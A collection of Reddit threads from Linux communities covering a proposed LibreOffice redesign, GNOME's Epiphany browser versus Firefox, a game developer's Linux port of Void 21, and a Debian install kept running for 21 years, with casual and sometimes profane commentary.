The UI as it is now is not that bad. Even my mother, who would probably be included in the group that might have issues with it looking dated, has told me that she prefers the neat look of Libreoffice to the mess that is Microsoft Office.
I don't see anything wrong with the way LibreOffice looks, especially with version 5.

What I find when projects decide to change things like this is that they completely fuck it up. 

Please just leave it alone 
If I wanted to use MS Office I would be using it.
LO interface is simple and intuitive.
Does making a mock up help them at all? Or do they need the code, it's going to take me a while to learn the code but I can make a mock up easy.
I saw [those](http://pauloup.deviantart.com/gallery/28216273/LibreOffice-Mock-ups) mock-ups some time ago and liked it. 

IMHO there's nothing wrong with LO's interface. It's flexible enough, and kinda pretty. If anything, it should be optimized for performance: I made a spreadsheet recently with 25,000 rows with dozens of formulas in each, and it opened quite slowly. I wouldn't mind if something was done about that, and I definitely don't want the interface to change instead. Especially not for ribbon or metro or whatever fancy shit is currently trending. If there would be some ergonomics research behind a change, then I'd be for it; otherwise I'm quite against simply trying to be "in the trend".
No, I'm not.  An ever changing UI is a fucking bullshit move, man.  Every damn time I upgrade to a new Office it's different.  WTF?
[deleted]
No no no! UIs are worse now in almost all ways than they were. I'd MUCH rather it look ugly and work well than the other way around.

Pretty much the only buttons I use is the new document button and the merge and center cells button.  Everything else is either right-click or from the menus.  Working with Word, I have to search through all the ribbons because MS hasn't had enough of my man-hours yet.
Oh no... Nonono. Please don't ruin the look of LibreOffice. 
I'm not tired of how LibreOffice looks. I think it looks fine how it is.

And please don't introduce that damn Ribbon. A menu-bar is far superior.

Please don't add a ribbon, please don't add a ribbon....
The surest way i know to ruin usability is to iOS and Win8 a UI.  Hamburgers are for restaurant menus, not software.  Flat design means you can't use contrast and unique colors and shapes to locate a function or feature.  All of these contemporary UI designs need a serious dose of reality and common sense.


What? Libre looks great. How could you possibly be unhappy with it's Design? 
Please just fork it and make your own office suite that focuses on looking pretty instead of getting work done.  
I'm not tired of it, actually I'm tired of all the stupid GUI redesigns which are nothing more than change for the sake of change. As an example, Firefox is unusable for me today and it's only getting worse. I hope libreoffice won't go the same way with similarly pointless 'innovations'.

And if you have to implement the 'ribbon' please give an option to go back to the classic toolbar layout.
Let's bring it out to 2002!!! Office XP has always looked awesome.
Whatever you do, don't try to push your own custom themes ala Office 2013 or Steam or whatever, especially on Linux. If the user wants drab grey or neon-green buttons, let them. Don't force them to choose between white, off-white, or black like Office does right now. Just... make it blend in with the system.
I only want improved visuals if they don't arbitrarily change conventions that have been around forever. I can barely do anything with modern office. There's nothing wrong with the traditional File, Edit etc menus. If it isn't broke, don't' fix it. 
i don't mind the appearance at all.  but i'm old and didn't mind the 90's either.
[deleted]
Tired? Damn it, I *want* it to look that way! If I wanted a useless, incomprehensible UI I would have moved to Office 201X ages ago!
infact, I have significant greater troubles with its very limited Office compatibility :/
#>MFW contributors put a "ribbon" layout in the next LibreOffice update.
Canonical usually gets a lot of thrashing for going their own way, especially with big projects like Mir, upstart and such. And the argument is that its better for the community if people contribute to the same technologies. Makes sense.

Well, a web browser is also a very big project and the situation of the open web is just as worse freedom wise with Google via Chrome controlling the web for the most part. As things stand right now, Firefox is the only mainstream browser that is open source and cares for the open web.

Mozilla has been in the web market for a long time and they actually invest a lot of effort to make the web a better place. But still it has been difficult because the competition has way more resources and market share.

Given this scenario, what sense does it make to build yet another browser instead of making Firefox better? It would give Firefox a standing chance against the bigger players.

In fact, one can argue, the benefits of working together on Firefox and making it better is spread multi-platform and is more important than many Linux desktop only technologies. 

So why does GNOME get a pass for causing fragmentation in an important market and not helping the mainstream browser instead?
There seems to be an awful lot of vitriol here, so against my better judgement, I'm going to try to respond. I'm paid to work on GNOME, but to the best of my knowledge, nobody is paid to work on Epiphany. It's a volunteer effort only.

The first thing that is important to understand is the difference between Epiphany and WebKitGtk.

 - Epiphany is a web browser, but does not include the rendering engine
 - The rendering engine (WebKit) is millions of lines of code and primarily maintained by Apple, with Igalia doing most of the Gtk work I believe
 - Epiphany is about 40,000 lines of C (not including tests or shared components) and written like a plain old GTK application

Now, for a bit of a history lesson

 - Epiphany pre-dates Firefox, and it used to be called Galeon (released June 2000)
 - Many years ago, GNOME created gtkmozembed for Mozilla, an embeddable HTML widget based on gecko
 - Epiphany/Galeon used to use this embeddable widget
 - Mozilla discontinued that project, thereby abandoning the "embedded HTML widget" community

There are many reasons to need an embeddable HTML widget in a platform. I don't think anyone needs convincing of that.

So there was a bit of an impasse. Mozilla did not want (it's unclear if they do now) an embeddable widget. Yet applications require one and the toolkit better damn well ship one that works.

You're unlikely to get good testing of an embeddable HTML widget unless you have applications testing it. So there needs to be *something* that gets enough testing to shake out bugs.

Furthermore, gecko has not been very good over the years at various features that down-streams needed

 - Reliable hardware and software compositing
 - GStreamer based codecs, which is a major component of the desktop, mobile, and embedded platforms enablement
 - Workable on low-power devices such as Raspberry Pi (a major driver of webkitgtk I believe)
 - Native widgets, it should match the rest of the UI
 - Wayland support
 - Support touch, gestures, multi-touch, smooth scrolling
 - Proxy integration with the platform
 - Hooks for adblocking and safety
 - Certificate store integration

I can probably think of more, but I'm neither a WebKitGtk or Epiphany contributor.

Also, consider the complexity and time involved. For a very small number of contributors, maintaining the shell around WebKitGtk is not a terribly difficult amount of effort. The amount of effort to do that same work inside something the size of Firefox would take considerably more people. So transferring that effort into the behemoth that is Mozilla would have a few downsides in the short term.

 - Their work would take much longer to ship, due to the complex support matrix of Firefox. A number of people in our community have, or currently work at Mozilla. Ask them, they know how much of a pain it is.
 - It would take more people than we have currently contributing
 - It would mean less testing for our HTML embedding widget

And finally, all the distros ship Firefox by default anyway.
So it's not like Epiphany is the preferred browser.
It's more like a reference implementation for the platform.

I'm sure I missed some things, but this should at least give you an idea.
[deleted]
Part of your problem is that you're assuming it's all one big community and everyone has the same goals. That's dead wrong from core principles.
It should be noted that Epiphany itself is a rather small project, at least when compared to Firefox or Chrome. According to Open Hub, Epiphany has about 50k lines of code and Firefox and Chrome are at about 15M. Therefore, hypothetically adding all the work that was done on Epiphany to Firefox wouldn't improve Firefox that much.

Of course, that does not include all the work that was done on WebKitGTK. But there are other programs apart from browsers that need a web engine and AFAIK Firefox's Gecko engine doesn't support embedding that well. So even if Epiphany was dropped, WebKitGTK (or something comparable) would still be needed.
They're not building a browser _engine_, they're building a browser _shell_. Making Firefox integrate into GNOME the way they want to would require them to rewrite Firefox itself in GTK (it uses a semi-custom widget system that depends on GTK, but does not use it everywhere), and then you'll just have Firefox and "Firefox-GTK" which is a whole other thing.
GNOME is a project were everybody is free to work with what they want. GNOME Web exist because there is devs that want to work on it. It's not "the GNOME Project that decide to work on it", it's some devs in the GNOME project that have fun working on it. And it's a way less complicated project that a complete browser, as it use Webkit. It's also a way less complicated project than Mir or Upstart. What was reproched to Canonical was to recreate a complete whole display server" instead of working on wayland. Of course some people were also against Unity, but Unity on Wayland would have made a far smaller outcry.

There is also devs that work on making Firefox better with GTK (for instance there is work on making it compatible with CSDs) :) Also, there is a difference between the resources of the GNOME Project (its only paid devs are paid by external compagnies to work on GNOME) and the resources of Canonical :)
Why does KDE get a free pass for maintaining a KHTML, and then WebKit, based browser, even back when Mozilla was in their early days and could use all the help? At least Epiphany used Gecko for 9 years. 

And why did you notice just now? GNOME had a web browser since 2003.
Volunteer work is not fungible. The people working on Epiphany/Web are not going to magically go work on Firefox.
GNOME needs an embeddable html widget to use in other places, not just the browser part. That is not really possible with Firefox, Servo might eventually be an option for that. WebKit is more suited as an embedded library, since it already has bindings for tool-kits, i.e. Qt

There are other parts of GNOME where collaboration with Mozilla exists however. To name some:
gnome-shell uses gjs, thats based on Spidermonkey (Mozillas Javascript Engine). People are working hard on Rust bindings for GNOME libraries. (https://wiki.gnome.org/Hackfests/Rust2017)

Best for the web - and the Internet in general - would be the widest possible number of different clients (browsers). So no one gets to dictate how different parts of the standards are implemented / rendered / encouraged / discouraged, etc.

And no one gets to implement proprietary extensions that clueless webmasters will rely on, making things shitty for everyone who isn't using OneTrueBrowser™ from EvilEmpire, Inc. (been there, done that).

P.S.: software diversity - just like biodiversity in nature - makes life harder for viruses/malware.
Your reasoning is flawed:

- There is only one browser, Chrome; this is a bad situation, because there is no competition.
- There are two browsers, Chrome and Firefox; this is a good situation, because there is competition.
- There are three browsers, Chrome, Firefox, and Epiphany; this is a bad situation, because there is competition to the competition.

This doesn't make sense IMO.

And it's also not how open source works. A healthy open-source ecosystem is constantly swinging back and forth between a de facto standard implementation and a chaotic mess of multiple competing implementations. This cycle looks something like:

- There is one canonical solution to a given problem.
- The solution matures and reaches an optimum.
- The situation changes: new technology becomes available, new insights in software design, language theory, or whatever appear, new requirements become commonplace, etc.
- The canonical solution, being mature and stable, has a hard time adapting to the new situation, and as a result, its suitability decreases.
- At some point, the canonical solution becomes painful to use, and new solutions pop up.
- Initially, the new solutions are immature and experiments, so the old one remains in place for a while.
- Eventually, two or three leaders emerge (sometimes including a massively overhauled version of the original solution) and start battling it out.
- Social dynamics amplify advantages and disadvantages, even if those are based on social inertia (having the right initial user base) rather than technical merits (being the technically superior solution)
- Eventually, one of the leaders becomes the new de facto standard, and the others retreat into niches, resort to extreme simplification, merge into the standard solution, or get abandoned.

Given this background, what we're seeing is that Epiphany is retreating into a niche - it's not going to become a mainstream browser, but most the technology used in it is also used for other things in GNOME / GTK, the extra effort of maintaining Epiphany as a barebones browser isn't large, and it provides a good testing playground for all the other stuff. Having a web view component is useful for a lot of things that aren't technically web browsers (consider things like email clients, feed readers, built-in help systems, etc.), so the whole web stuff needs to be maintained anyway; a browser, even if it's barebones and nowhere near competitive, is a useful thing to have, even if it's just to easily test the components it shares with the greater ecosystem.

Meaning that "developing a good web browser" probably isn't the most important goal for Epiphany; the real goals lie elsewhere, and abandoning Epiphany and contributing to Firefox instead would not help those goals.
The fact that epiphany uses WebKit means that it doesn't have to be a huge project. Having a simple browser built on system libraries included in your desktop environment is probably a good thing in my opinion.
Why doesn't Google contribute to Firefox?
Well KDE has konqueror as well. Xfce has more or less midori.
KDE and Gnome fail at promoting desktop Linux adoption because they expect crucial apps to come to them. They don't integrate themselves around viable workflow. 

What apps might attract commercial Linux deployments? Creative tools. Blender, OpenToonz, Natron, Krita, Inkscape, Audacity and Ardour, Scribus. Etc. These tools solve specific problems and they're free. Most importantly, they can be chained together. And they can be launched remotely in batch on the cloud or in local farms for rendering, without incurring additional licensing charges. 

Animation houses, advertising firms, filmmakers, and design freelancers can use these tools to produce high quality deliverables. KDE and Gnome is meaningless to that workflow. And - in fact - KDE and Gnome devs get in the way of that workflow by expecting applications to conform to their standards. Hoping the apps and their users would conform to their desktop model. 

It's the same mistake OSF made with CDE. They tried to leverage Motif to get everyone on CDE instead of accepting what the user community was actually using these computers to accomplish. And now CDE is one more 'nix desktop in the dustbin. 

Pushing Wayland to get everyone off X apps won't help. It will only drive the final refuges away to Windows, who are merely trying to get work done. The only people who won't care are devs who live in emacs or vi terminal windows and for whom the desktop environment is nice eye candy. 
[deleted]
To me Gnome Web is just an example of what a Web browser should be like under the Gnome project.
Nobody expects people to use this as a full time browser. It may work in a pinch but I have tried it now and again over the past years and it still has a tendency to crash or be very slow.

I feel like this is exactly what is great about open source software: if you want to fork software, for any reason, you just do it. This is a good thing because it means that we have developers attacking problems from different perspectives and this diversity helps us to see what works and what doesn't much faster. Mir wasnt a fork, it was an alternate compositor solution. But the demise of Mir is a demonstration of OSS should work. You try something, if it works, it becomes the standard, if it fails, it's because something else has finally established itself to become the standard. We need to promote forking as a feature not as a flaw of open source software. 
As far as I am aware, Debian does not provide security support for Epiphany. I don't think Ubuntu does either.
Fragmentation is good.  Some of the best software was written by guys who were just trying to make a better X, because it _personally_ annoyed them that the mainstream X wasn't what they wanted.

Ahem, *Linux*.
In the past my favorite browser was opera 9.x. I haven't found a favorite browser since that. But I would rather there be a lot of options for browsers in the hope that from the large pool of browsers, uniquely interesting ones will emerge.
Side question: Chrome/Chromium is based on a Webkit fork, no? Have any contributions from Google made it back upstream?
> well, a web browser is also a very big project

The biggest parts of a web browser are the web rendering engine and the JavaScript engine, both of which GNOME *isn't* developing. What they are doing is developing a chrome that feels natural on their desktop, since they're a desktop environment vendor and the browser is one of the most used applications today. Wanting that to feel "native" to their environment is not that big of a surprise and developing a chrome around a web rendering engine is nowhere near as big of a task as developing a whole browser, or in fact a display server.  

> It would give Firefox a standing chance against the bigger players.

It wouldn't. The majority of the competition and Mozilla itself have their install bases on Windows, Mac and mobile. Adding a tiny fraction of Web users to the mix wouldn't really help.

> So why does GNOME get a pass for causing fragmentation

How are they causing fragmentation? They're using a mainstream browser engine and just developing a chrome around it, so that it looks nice on their desktop, which Firefox often doesn't.
Calling that "fragmentation" indicates either lack of understanding or deliberate attack on GNOME. No one is angry at Canonical for developing their own font, icons etc. to make their desktop feel nicer, the Web chrome is designed to do just that for GNOME. 
>So why does GNOME get a pass for causing fragmentation in an important market and not helping the mainstream browser instead?

They want to have this ecosystem of Gnome branded applications would be my guess. It's a complete waste of time and resources IMO because honestly, who the uses Web/Epiphany? 

The same can be said for Gnome Recipes  Games, and Map. The Gnome 3 developers would be better off improving the Gnome 3 shell and it's core applications rather than these half baked applications.


Because Linux is about choice. Duh!
hate to canonical usually comes from people who uses other distro ("why not gnome"(but they have ubuntu gnome), "why mir, it's vendor lock"(hey man, it's open source), "reinventing wheel"(so, what's your problem, they are wasting their money for a new, big and strong wheel) ). people who uses ubuntu but hate unity being default, they were born to hate. gnome gets no hate because chrome user don't care about it. (i know i will get down vote but this is the truth)

edit:
gnome gets no hate because chrome user don't care about it -> gnome gets no hate for epiphany  because chrome user don't care about it
does anyone (gome users include) find an advantage to using epiphany over others?
> Well, a web browser is also a very big project and the situation of the open web is just as worse freedom wise with Google via Chrome controlling the web for the most part. As things stand right now, Firefox is the only mainstream browser that is open source and cares for the open web.

You make a very valid point about how limited the field for open and free web browsers has become.

>Given this scenario, what sense does it make to build yet another browser instead of making Firefox better? It would give Firefox a standing chance against the bigger players.

Wait, what?  No!  You've already made the case for more choice in this type of software, why are you trying to skew it into an argument to support another monolithic group just because 'it's the only game in town'?  That's the same shitty tactic the closed source people use!
Because Linux means doing things your way.  Which also means there are 50 of everything and they're all broken.
The same could be said of Konqueror and ReKonq on the KDE side.  But Konqueror's rendering engine became Webkit, which was adopted by Apple and Google.

I like Epiphany a lot more than Firefox.  If it supported plugins, I'd use it daily.  I really need lastpass to work with it.

I've tried to integrate Firefox with Gnome, and there are plugins that do a half-decent job at it.  But it doesn't look nearly as nice as Epiphany does.
[deleted]
[deleted]
Lets ask all those that commented recently about Canonical's giving up on Unity & moving to to Gnome

Many of those people complained that it was "about time" Canonical stopped fracturing the linux community....  apparently their complaints are only directed at Canonical/Unity and not at Gnome itself & its own practices as you describe.

 
Chromium is open source...
I think actions, exactly like you are describing, are the key to the success of Linux on edge devices (desktops, tablets, phones). Everyone needs to stop trying to do everything separately. Everyone needs to do less and share more. This is even more important for stuff under the hood, but a unified front on something like Firefox would be good too.
In other news the address bar will not be hidden in Epiphany in the  next version of GNOME. This is great news. Maybe it is time to try out Epiphany again. 

https://blogs.gnome.org/mcatanzaro/2017/03/23/a-web-browser-for-awesome-people-epiphany-3-24/
Oh look, yet another reddit post full of people who just jumped off the Microsoft Sinking Ship who think they know how Free software should work and that everyone should all be working on the exact same thing towards a single, unified desktop and goal thus removing all competition and different viewpoints and goals like their precious Windows did instead of what Free software does best: allow a wide variety of things to exist that work separately yet allow their source code and ideas (via Free software) to migrate to any other project that wants to benefit from them tempered by their own ideals and needs.

It's a beautiful thing we have set up here, guys.  Please trust that it works, and let it work its magic.  You will benefit in the end.
Some duplication of effort is unavoidable with robust competition.

So to a point it's a good thing, in that it encourages innovation

And then here are opportunities - in open source especially - to fold the best ideas from your competitors into your own product so everyone wins.
Does the general public have access to Firefox analytics?
> upstart 

That's a new one. Until systemd I think most people were thinking upstart was the way to go.

> So why does GNOME get a pass for causing fragmentation in an important market and not helping the mainstream browser instead?

You can do your own thing, it's just a question of whether it makes sense to do and you can afford it. GNOME is assembling their stuff using FOSS for a particular goal, one Firefox isn't necessarily going to share. If they can do what they want using Firefox or Chromium (even if it requires submitting upstream changes to allow the functionality required) or something they _should_ do that since Epiphany is kind of pointless outside of just wanting to give people a web browser without pushing them to any particular one.
Competition in browsers is good for the web.
I don't think Gnome wants to constantly maintain Firefox and each update in order to make w browser that fits their theme.
I'm no Linux guru but I use Epiphany in Ubuntu Gnome mainly because no one else does so it's not an attractive target for exploitation. It's light, fast, & responsive to my meager needs.
Because Firefox is slow as molasses and has been forever? Because Firefox market share has taken a dive into oblivion? Epiphany used to use Gecko, but abandoned it because it was an inferior mess, and caused the devs great pain. Epiphany/Webkit is far superior.
gnome wants to be windows.
Epiphany is their internet explorer.
Because GNOME is totalizing. The aim of GNOME or any DE is not to build a set of loosely coupled apps and tools in the communitarian Unix tradition, but to build a single common API backplane and then set of tightly coupled apps and libraries that all use that same backplane. Firefox hasn't yet submitted to the will of GNOME so it is outside the GNOME project's interest.
They are arrogant they want their own everything
Maybe for the first question. Not anymore for the second question since Firefox has already wasted their moment in the spotlight. 

For interesting browser history insight regarding Netscape/Firefox/Webkit, listen to some of the podcast interviews of Don Melton. He used to work at Apple on bringing Webkit to iOS and also worked on the ancestor of Firefox. My impression from him was that the codebase for what would eventually become Firefox was what drove him to try to start over for iOS by improving Webkit.

So while I'm still not a fan of the gnome team I don't completely blame them for not working on Firefox.
'branding'
The internet needs an Epiphany
Why are boobs good? How are rainbows made? It just does. 
I would like an alternative to Firefox.  Probably some plug-in or other but it's making a lot of requests to a lot of weird sites I haven't asked it to.

I've been using Epiphany for the last few days.  It's a little rough but I see it making no unexpected web requests.  I'm looking forward to the next GNOME and the next Epiphany with it.

No. Firefox can be customized to to what you need. It's very flexible. The gnome Dev team are like benevolent slave masters. You WILL do things their way because they know best. Why would you want to do it differently anyway? They are smarter than you and know how you should be using your computer. That feature you think you want because you think you used it daily is completely useless and you never used it anyway. 
Because Firefox/Thunderbird will never fully integrate with linux.
Why doesn't Gnome just work on their own fork of Firefox and feed their chances upstream?  

I think is what OP meant to say...
Do you want the truth? Or do you want a social justice bullshit answer? 

If you want the truth, it's simply because gnome sucks, and it's backed by Redhat which has a terminal case of NIH syndrome. 

Gnome is run by a bunch of insular whiners who can't seem to cooperate with anyone, including their own users. Since they don't control Firefox, it offers users some options, which gnome decided would probably be "confusing and distracting to the users." 

So just like the rest of their gnome apps, I'm guessing their browser sucks too. Fortunately, I will never know for sure.

If you want a social justice answer, well I can't really help you there. It probably has something to do with feminism or white privilege.
It's scary that people are seriously suggesting this.

Gnome 3 represents almost everything that is wrong with linux today.
Uhhh... OP, there's this thing called chromium. It's an open source version of chrome.
1. Yes, it would.

2. Because GNOME are douches who fap over Metro and are more interested in making things less functional, not better, as to them, users are evildoers who they must convert to their ways and never allow to have control over anything because what they think is evil and wrong and they will be happier once their options for 'choice' have been removed, even if they don't know it yet.

I will admit, I don't know much about Epiphany, but I can imagine, if you let GNOME design a browser, it would make Chrome look like a shining bastion of user choice and customisability by comparison.
Only thing missing from Epiphany is lack of userscript support. Otherwise it is better than firefox. 
[deleted]
I completely agree.
They are allowed to make their own browser, at least until W3C sells out to Hollywood and makes the web a two tier system via Encrypted Media Extensions.
[deleted]
Even though I am not a fan of GNOME I like Epiphany/GNOME Web and similar simpler browsers. Qupzilla (which uses qtwebengine) is good enough for me currently for most things.

I never liked Mozilla's marketing. For example I hate the video "The Web We Want: An Open Letter". 
i know it (firefox) doesnt perfectly integrate with their ecosystem but i just think them making their own browser is such a massive massive task and those skills and time would be better spent on basically anything else.
Firefox, the browser that blindly trusts Google's lies about "malware" in open source software?
“Firefox will never be able to offer a good user experience when it is stuck in the past.” — Ouch
After a few problems with alsa sound drivers, stereoscoping rendering crashing the game even though it wasn't being used, and SteamOS just refusing to start after updating itself, [Void 21 is finally available on Linux](http://store.steampowered.com/app/444550/).

Doing the port was... interesting... and challenging. Unlike the Mac port that just quite literally worked out of the box, the Linux one had a few problems and just getting Linux itself to behave is a challenge of its own. The biggest problem faced is that you don't know if a specific issue is your code, the game engine code, driver code or the distro that you're running.

I was testing with no AA because my Intel GPU driver does not support AA. Thankfully I had a friend that could help me out by testing it on an nvidia GPU where AA worked just fine. 

Having said all of that, the port itself took only two weeks. In game development terms, that’s not a long time at all and as this becomes an easier process every day we may soon see more AAA companies bringing their games over even on launch. 

Here's to hoping that this is just another small step in the direction of getting Linux to be a serious competitor in the gaming industry. I know my game alone is not going to do that, but maybe if enough of us devs take the leap first it will make it easier for the regular users to take the leap as well.

Next stop: Vulkan and SteamVR! When Unity3D supports it that is…

Also feel free to AMA, I'm really happy to reply to any questions that I can. 

EDIT: [Here is a review made by gamingonlinux.com, should you want to know more about how the game behaves](https://www.gamingonlinux.com/articles/void-21-a-nicely-presented-procedurally-generated-arcade-style-fast-paced-runner-and-shooter-now-on-linux.7164)
> Unlike the Mac port that just quite literally worked out of the box, the Linux one had a few problems and just getting Linux itself to behave is a challenge of its own. 

Could you give practical examples of the problems that you encountered ? One would think that it would just be a matter of rebuilding everything and pressing "play" if it already works on OS X & Win
Ah, nice!

You'll have to excuse the people going ape over audio. If there's one thing the Linux community is good at as a whole, it's arguing whether or not to use one of the two things that do the same thing--but differently.

Here's hoping more devs take the time to do this.
Alsa is a problem for a lot of people porting games or programs. I think fixing the clusterfuck that is audio on Linux is a huge priority that people overlook
You had my money at "Linux port". You talking with the community cemented my supporting your future projects. Thank you for being awesome, and down to earth. 

The Linux community needs more developers like you willing to take a chance on us. We appreciate you.
why do people hate pulse audio so much...?
Thanks Mate!
Have you considered x posting this at /r/gamedev?
The problem to AAA companies is not port, but keep free of bugs and give support to users.

If they port it to linux, they'd have twice the amount of bugs, spend twice the amount of time working on them, and just 5% of customers would feel it.
I have to switch to Ubuntu by the time Windows 7 support expires in 2020, so thank you for the work you are doing to bring games to Linux.


> The biggest problem faced is that you don't know if a specific issue is your code, the game engine code, driver code or the distro that you're running.



Isn't that a bigger issue when your drivers and OS are close source so you can't actually dive in and determine where the root issue is? 
I'm eager to see if Ubuntu's snappy is actually what we need for a Steam client that just works. Currently it breaks and needs tinkering every few updates.
My impression is that support for linux is becoming more common as it becomes supported more widely by game engines.  I'm currently developing a game for Window, Linux, and OS X, and so far the cross-platform aspect for my rather simple game is mostly trivial due to using Unreal Engine 4. So given that's the case for a lot of developers depending on their game engine, why not support it? It's mostly just a matter of actually compiling the project one more time.

The only challenge I ran into is that the clang compiler (used by UE4 on linux) generally seems to be way ahead of the MSVC compiler in terms of new C++ feature support. I started developing on and for linux - so I had to deal with getting UE4 set up with VS 2015 rather than 2013, so I'd have support for `constexpr` uses everywhere that I didn't want to give up.

If I'd started on Windows, I really don't know if I'd have had to do anything other than just compile the project on linux, and then bam, cross-platform done.
Linux has awhile before we get a wider adoption of people jumping over, the wireless drivers are still terrible, with Qualcom drivers almost nonexisting, Video drivers are still flakey with Nvidia and AMD, though AMD is attempting to fix this, and Linux has it's own slew of irritants to make it less friendly for the above average user. 
Where I can download a demo of your game? The Steam demo is windows only. 
Looks interesting how well do the VR libs work with cross platform support. Also wondering how easy supporting different kinds of VR setups are. Seems like it could be a pain and only made worse with different motion controllers.
How us vulkan to learn? Compared to dx and open gl?
This isn't the first time I read about someone having issues with the stereoscopic rendering without even using it. This is odd... Perhaps the default settings are a bit crappy
Congrats! 
Champion of the peoples bruh.
>After a few problems with alsa sound drivers

this is actually a statement i read a lot lol
> I was testing with no AA because my Intel GPU driver does not support AA. Thankfully I had a friend that could help me out by testing it on an nvidia GPU where AA worked just fine.

As you are a game developer I think it's a good idea to invest in a GPU to prevent future problems like this. Even an entry level one is fine.
Cheers mate, every game we get helps.
Maybe /r/linux_gaming would be a better place for this post.
>The biggest problem faced is that you don't know if a specific issue is your code, the game engine code, driver code or the distro that you're running.
  
Shouldn't you just target steamOS and forget about the other distros? Isn't it the deal of steamOS? Being the target and each distro deals with how to integrated steam in their own system?
You know, people didn't just invent "pc gaming". There were personal computers and people started making games for them. It's all different now, of course, with the master race leading the movement online and whatever, but you get the point. People usually have a computer they need anyway and think "Well, might as well buy a bit of a more expensive one that also plays well". For linux gaming to take off, we'd have to come full circle to the year of the linux desktop, which I'm sorry to say, probably won't ever come. Not without extreme investment into the software, not without several killer apps, or not short of a total breakdown of society and conversion to socialism where MS and apple disappear because there's no more wealth to be made.

And even though I'm still a linux noob I can clearly see that linux lacks everywhere. Let's stop the delusion. LibreCalc won't automatically realize that a letter can be a string value? No-go. VLC can't play song titles with Umlauts? No-go. Have to use wine or gimp? No-go. Plus for some reason, mint/kde forgets there's a disk drive sometimes. No, I don't want help from anybody or a "Well those are just basic fixes via "obscure CLI program whose commands aren't even standardized and whose GUI has to be downloaded separately". We just need to be honest: In every "What linux program would you like?" thread, after you're done reading it, you realize "Everything!". Hardly anything is clean, user-friendly. Linux needs *everything*. Yes, if you're an IT guy or a grandma who only wants to write mails, it's great, for everybody else it ain't. ./configure-make-install - seriously? Right, I forgot, exes are the devil. Passwords by default to use the software manager? Get out!
Today my Debian installation turns 21!! Its finally an adult.

I started using Linux in the late '90s through various flavors of Redhat and Mandrake. Then in early 2001 when I bought a new hard drive I decided to try Debian. It was known to be a little harder to get configured than other distributions, but I was told the maintainability was worth the effort.

Since then I've dist-upgraded for 21 years!

During this 21 years the underlying hardware has changed many times from 20Gb hard-drives, ISA-modems, and graphics cards with nearly impossible to install drivers.

The machine was installed with Potato (Debian2.2). For a while it was my only desktop computer. Then later it became the living room computer with web browsers, email, photos, video, and music. It now sits in a cupboard running websites, firewall, code repositories, openvpn servers, mail servers, backup servers (backuppc etc), and fileservers (samba, NFS etc).

The system has moved technologies like ext2, to ext4 on LVMS; from 32bit libraries to 64bit multiarch. (The 32bit to 64bit migration was the hardest upgrade I ever had to do.)

Congratulations to the Debian team for producing an unbelievably maintainable system!

The best way I found to confirm the installation time is to use the stat command to look at when root's mail file was created:

    root@elivs:~# hostname
    elivs
    root@elivs:~# stat /root/mail
      File: /root/mail
      Size: 4096            Blocks: 8          IO Block: 4096   directory
    Device: fe00h/65024d    Inode: 24380195    Links: 2
    Access: (0700/drwx------)  Uid: (    0/    root)   Gid: (    0/    root)
    Access: 2022-04-18 03:46:13.475697168 +1200
    Modify: 2001-04-18 17:34:55.000000000 +1200
    Change: 2020-01-04 15:27:58.530005632 +1300
     Birth: 2020-01-04 15:27:58.530005632 +1300

**There have been a few  questions that keep coming up:**

**Why?**

Essentially, the install is so old because I'm lazy.

I want my machines to be a tool that continues to work when I need it. I don't have time to spend on lots of home sysadmin.

Dist-upgrading is usually faster than re-installing then reconfiguring. Once  you've done a certain amount of configuration of services and tools it  tends to be easier to upgrade than do a clean reinstall. For example, I think I've only had to re-configure Samba 1-3 times over 15 years. Otherwise the samba config seems to migrate fine with each dist-upgrade and so it keep serving files to the family's other computers.

There  will be some "cruft" with packages that I've installed but no longer use. However there are tools for finding obsolete packages. The biggest mess is my \~/.\* directories from user land tools that I no longer have installed. While this is messy it doesn't effect system performance. At some stage I should sort through this - right after I tidy my garden shed.

As I said, it's a tribute to Debian packaging system that upgrades have been easier than reinstalls.

**32 to 64 bit**

It was an cross-grade from 32 to 64 bit using multi-arch. There are instructions here: [https://wiki.debian.org/CrossGrading](https://wiki.debian.org/CrossGrading)

By  the time I wanted to move from 32bit to 64bit, I had so many services  running I would have had to spend hours re-configuring them all on a  fresh install. I guess I could have copied all the config files, but I'm  not sure that would be much faster.

In  the end, when I bought a new disk I copied the system (not /home) to  the new disk - so the old disk became the backup. I followed the  instructions on cross-grading. There was lots of downloading and  re-install of each package's new binaries, but this is all done without  user intervention. The first time it failed because I presumably did  something wrong. Second time it worked well.

Thus,  overall it was probably only a few hundred key strokes to migrate from 32bit to 64bit. Much much faster than a re-install and re-configuring  packages.

**Other**

This particular machine has been tracking "stable" for most of its life. Dist-upgrades have therefore been relatively pain free.

There  have been a few minor hick-ups with deep system changes. Eg  lilo to  grub where I had to manually make the transition, but that was a good  time to move from "legacy" boot to efi.

Usually  with these sort of deep system changes you have 1-2 releases of Debian  to make the transition, rather than shifting when it's first introduced.  Often by the time I make the transition I've already been using the new technology on other machines. Plus, by that stage there will be plenty of How-Tos and  tutorials. For example, there was no urgency in switching from SysV init scripts to systemd - I could simply transition when I was familiar with systemd from other machines.

The trick, if anything, is that machine never uses bleeding edge technologies. I have other machines for that.

&#x200B;
So this is a unique case of [the ship of Theseus](https://en.wikipedia.org/wiki/Ship_of_Theseus) (or Trigger's broom if you prefer).

Congrats OP!
Nice!  


I'm very proud of my 9yo Arch Linux instillation. But that's nothing on 21 years!
This is 2 years older than me. My respect to this. <3
Haha this reminded me of Trigger's famous line from Only Fools and Horses...

&#x200B;

>And that's what I've done. Maintained it for 20 years. This old brooms had 17 new heads and 14 new handles in its time.
Fantastic post - it's my distro of choice too. Been using it for close to ten years now, I think!
Nice story!

Are you still using 32-bit or was there a one-time fresh install of 64-bit in that 21 year history?

I ask because I have been using Slackware since about 2001, but a few years ago I had to perform a fresh install to move to 64-bit. That said, most of my system configs and home profiles copied with little to no fan fare.

Nonetheless, hat tip to you!
Isn't the majority of age almost everywhere at 18?
What the heck?  


I just replied "very nice" to this and it was auto-rejected for being inappropriate.
So technically I can have sex with your Debian installation so you better watch out.
Congratulations, my oldest Gentoo is 19 by now. Cheers 🥂
My Installations of anything probably don’t turn 21 months xD. Distrohipping too much probably but whatever.
Mazel tov! Are you going to buy it a beer?
Er, ah, what happened in 17/18 April 2001?

    58705,6> cat /root/mail/saved-messages 
    From MAILER-DAEMON Tue Apr 17 10:18:23 2001
    Date: 17 Apr 2001 10:18:23 +1000
    From: Mail System Internal Data <MAILER-DAEMON@scuzzie.physics.usyd.edu.au>
    Subject: DON'T DELETE THIS MESSAGE -- FOLDER INTERNAL DATA
